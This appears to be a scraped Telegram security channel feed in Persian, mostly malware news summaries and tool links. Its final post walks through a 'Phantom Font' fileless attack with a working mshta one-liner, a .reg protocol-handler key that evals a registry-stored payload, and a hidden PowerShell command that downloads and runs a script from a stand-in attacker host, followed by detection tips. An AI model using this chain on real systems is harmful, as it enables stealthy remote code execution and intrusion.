Network Security Channel
2.57K subscribers
5.33K photos
3.42K videos
5.56K files
4.44K links
شروع از سال 1395
Security Operation Center (SOC)
Bug Bounty
Vulnerability
Pentest
Hardening
Linux
Reasearch
Security Network
Security Researcher
DevSecOps
Blue Team
Red Team
Download Telegram
⭕️‏شرکت امنیتی سوفِس در گزارشی از کمپین یک ‌#بدافزار اندرویدی علیه مشتریان چهار بانک ایرانی خبر داد. این چهار بانک عبارتند از بانکهای ملت، صادرات، رسالت و بانک مرکزی.
‏این بدافزار امکان سرقت نام کاربری و پسورد حسابهای بانکی و خواندن پیامک کاربران را دارد. نکته مهم دیگه درباره ‏این بدافرار استفاده از یک گواهی دیجیتالی احتمالا بسرقت رفته از یک شرکت در مالزی است که برای قراردادن بدافرار در گوگل پلی استفاده شده است.
همچنین از اونجاییکه  نام تعدادی اَپ کریپتو در سورس کد بدافزار قرار داره، احتمالا سازنده های این بدافزار اهداف بزرگتری در سر داشته اند.

https://news.sophos.com/en-us/2023/07/27/uncovering-an-iranian-mobile-malware-campaign/

https://github.com/sophoslabs/IoCs/blob/master/Iranian-banking-malware.csv

#malware #mobile #android
@Engineer_Computer
🔥4👍2🤯1
لیست API هایی که Malware ها استفاده می کنند.
لیست کامل از سایت زیر قابل مشاهده است:
https://malapi.io/#
#security
#API
#malware
@Engineer_Computer
#malware #python #pythonic_malware

چه طور میشه از پایتون برای توسعه یه بدافزار استفاده کرد!؟
پیشنهاد می کنم این مقاله بخونید تا از اخرین تکنیک های توسعه بدافزار با پایتون اشنا بشید

https://www.cyborgsecurity.com/cyborg-labs/python-malware-on-the-rise/

@Engineer_Computer
⭕️ ادوارد اسنودن در توییتی کنایه آمیز به نتانیاهو تلاش وی برای توسعه تجارت پرسود فروش جاسوس افزارهای اسراییلی به حکومتهای تمامیت خواه جهت هک گوشیهای فعالان حقوق بشر رو یادآور شد و در پایان به این حقیقت اشاره کرد که گویا این ابزارهای جاسوسی کارایی چندانی جهت جاسوسی از حماس ندارند.

#snowden #israel #war #malware
@Engineer_Computer
🔴 گروه ایرانی Scarred Manticore، خاورمیانه را با بدافزار LIONTAIL هدف قرار می‌دهد

گروه Scarred Manticore سازمان‌های مطرحی را هدف قرار می‌دهد که مشخصا بر ارتباطات راه دور، نظامی و نهادهای دولتی جدای از موسسات مالی، ارائه‌دهندگان خدمات فناوری اطلاعات و سازمان‌های غیردولتی تمرکز دارند.

مجموعه Check Point Research و تیم پاسخگویی به حوادث Sygnia در ادعاهای خود، یک کمپین جاسوسی جدید ایرانی را که با گروه تهدید Scarred Manticore مرتبط است، کشف کرده‌اند.

در گزارش چک‌پوینت ریسرچ با عنوان «از آلبانی تا خاورمیانه: مانتیکور زخمی در حال گوش دادن است»، آمده است که این گروه از یک فریمورک بد‌افزاری که قبلا شناسایی نشده به نام LIONTAIL استفاده می‌کند. این بدافزار از بارگذارهای سفارشی و payload‌های shellcode مستقر در حافظه استفاده میکند تا عملکردهای مخرب خود را در ترافیک شبکه قانونی ادغام کند.

#Cybersecurity #Cyber_Attack #Scarred_Manticore #LIONTAIL #Malware #Backdoor #Iran #Israel #Digital_Chameleon #OilRig #Framework #امنیت_سایبری #حمله_سایبری #بدافزار

مطالعه کامل خبر 👉
@Engineer_Computer
👍1👎1🔥1
⭕️ به حمله ای جالب از سری حملات بر روی QRCode ها تحت عنوان QRLjacking برخورد داشتم که به روش کار آن میپردازیم.
این سری از حملات معمولا ترکیبی از مهندسی اجتماعی،فیشینگ و بعضا همراه با بدافزار خواهد بود.
به طوری که فکر کنید محل و مکان معتبری که در آن اطلاعات شخصی و مشخصات خود را ذخیره دارید و اگر براکت های QRCode دار آن محل را مهاجم دستکاری کرده و یا لینک آن را در فضای مجازی به شما ارسال کند و به لینک مقصد خود و با همان ساختار سامانه مشابه هدایت کند،
از این تکنیک حملات استفاده میکند.
البته باید گفت گاها اتفاق می افتد که برنامه های QRCode خوان خود نیز آلوده بوده و منجر به فیشینگ و یا ربایش اطلاعات خواهد شد.
https://www.hackread.com/hackers-exploit-qr-codes-qrljacking-malware/
#Phishing #Malware #RedTeam

@Engineer_Computer
👍2
👹Malware Analysis Tools👾

Mindmap of links:

Encoding/Decoding tools
File Carving tools
Memory Forensics
Online scanners
Malware analysis tools
Debuggers/Decompliers

🔗
https://malwareanalysis.tools/

#malware
@Engineer_Computer
2
⭕️ 3 روش برای بارگذاری داینامیک کد در اندروید

بارگذاری کد داینامیک در اندروید از روش‌هایی است که بدافزار ها برای پنهان کردن رفتار مخرب خود از دید آنتی ویروس ها استفاده می‌کنند.
در این مقاله محقق امنیتی 3 روش مختلف برای لود داینامیک کد ها مثال زده است
1️⃣DexClassLoader
2️⃣PathClassLoader
3️⃣InMemoryDexClassLoader

🔗 Blog Post |
Github

#Android #Malware
@Engineer_Computer
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️ Android Malware with Fake Extension(PDF) in Whatsapp

در این حمله نفوذگر توسط دستکاری کردن و تغییر نام اکستنشن نمایشی در صفحه چت واتساپ اهداف خود، بدافزار اندرویدی با فرمت apk را با اکستنشن نمایشی pdf در واتساپ برای قربانیان خود ارسال کرده و قربانیان با فرض بر pdf بودن فایل ارسالی، بدافزار را نصب کرده و دیوایس شان آلوده میگردد.

#Android #Malware
@Engineer_Computer
😱2
🔘تحلیل تغییرات فایل‌ها و فولدرها در سیستم‌های آلوده به Malware

یکی از پیامدهای آلوده شدن سیستم به بدافزار (hashtag#Malware)، امکان ایجاد تغییراتی در فایل‌ها و فولدرهای سیستم توسط کدهای مخرب است. برای تحلیل زنده (Live Analysis) سیستم‌های آلوده، یک روش مؤثر صحت‌سنجی فایل‌ها و فولدرها به کمک ابزارهایی مانند:

🔘 PA File Sight
🔘 Tripwire File Integrity and Change Manager
🔘 Netwrix Auditor

این ابزارها تغییرات ایجادشده را شناسایی می‌کنند و تحلیل دقیقی ارائه می‌دهند.

اگر دسترسی به ابزارهای تخصصی فوق وجود ندارد، ابزار داخلی Windows به نام Sigverif می‌تواند برای بررسی تغییرات در فایل‌های سیستمی مورد استفاده قرار گیرد.


#CyberSecurity #MalwareAnalysis #FileIntegrity #ThreatDetection #WindowsTools #SystemSecurity #Sigverif #Tripwire #NetwrixAuditor #ITSecurity

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
2
🎯 حمله فونت شبح (Phantom Font Attack): جایی که mshta.exe با رجیستری متحد می‌شود!

یک فونت، یک فایل .reg و ابزار قانونی mshta.exe
و این سه در کنار هم می‌توانند یک حمله Fileless واقعی بسازند که حتی EDRها هم جا بمانند!



🔎 پراسس mshta.exe چیست و چرا باید به آن شک کرد؟

پراسس mshta.exe یک ابزار رسمی ویندوز است که برای اجرای فایل‌های hta (HTML Application) طراحی شده است.
این فایل‌ها می‌توانند شامل JavaScript و VBScript باشند و mshta.exe آنها را با سطح دسترسی کاربر اجرا می‌کند.

📌 محل پیش‌فرض:
C:\\Windows\\System32\\mshta.exe



چرا مهاجمان عاشق mshta.exe هستند؟

به‌صورت پیش‌فرض در ویندوز نصب است (Living Off The Land)
اجرای مستقیم اسکریپت حتی از اینترنت یا رجیستری
اغلب در لیست سفید آنتی‌ویروس و EDR قرار دارد
ابزاری برای اجرای حملات Fileless و مخفیانه



📌 نمونه استفاده مخرب:


mshta.exe "javascript​ : new ActiveXObject('WScript[.]Shell').Run('calc.exe');close();"




🧩 مراحل حمله فونت شبح:

1️⃣ طعمه (Phishing)
قربانی ایمیلی با لینک نصب فونت شرکت دریافت می‌کند (مثلاً CorpSans.ttf)
اما به‌جای فونت، یک فایل مشکوک .reg را دانلود می‌کند.

2️⃣ تغییر رجیستری (Registry Trick)
فایل .reg یک Protocol Handler جعلی به نام fontview:// تعریف می‌کند.
و می‌گوید: «اگر fontview://load فراخوانی شد، این دستور mshta را اجرا کن»:


[HKEY_CLASSES_ROOT\\fontview\\shell\\open\\command]
@="mshta.exe \"javascript​:eval(new ActiveXObject('WScript[.]Shell').RegRead('HKCU\\\\Software\\\\PhantomFont\\\\Payload'));window.close();\""


3️⃣ اجرای کد بدون فایل (Fileless Execution)
صفحه وب به fontview://load ریدایرکت می‌شود.
پراسس mshta.exe اجرا می‌شود، مقدار Payload از رجیستری خوانده می‌شود و PowerShell مخفیانه اجرا می‌شود:

javascript
var sh = new ActiveXObject('WScript[.]Shell');
sh[.]Run('powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'hxxp://attacker[.]com/stage2.ps1\'))"', 0, false);




🔍 چرا این حمله خطرناک است؟

Fileless → هیچ فایل اجرایی روی دیسک نیست
استفاده از ابزار قانونی ویندوز (mshta.exe)
ذخیره کد در رجیستری → بدون فایل مشکوک
اجرا به‌صورت Stealth (بدون پنجره و هشدار)



🛡 نکات مهم برای Blue Team:

🔸 اجرای mshta.exe باید محدود یا مانیتور شود
🔸 تغییرات در مسیر HKEY_CLASSES_ROOT و Protocol Handlerها را لاگ کنید
🔸 هر اجرای ناگهانی mshta بدون فایل .hta را بررسی کنید
🔸 تحلیل دقیق ترافیک شبکه و DNS برای ارتباط با سرورهای مشکوک



🔐 یک فونت کافی است تا دری به سوی حمله باز شود.
امروز به mshta.exe شک کنید!

#RedTeam #BlueTeam #Malware #Phishing #FilelessAttack #RegistryHacking #mshta #CyberSecurity #WindowsSecurity #ThreatIntel #EDRBYPASS

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
2👏2🔥1🎉1🤩1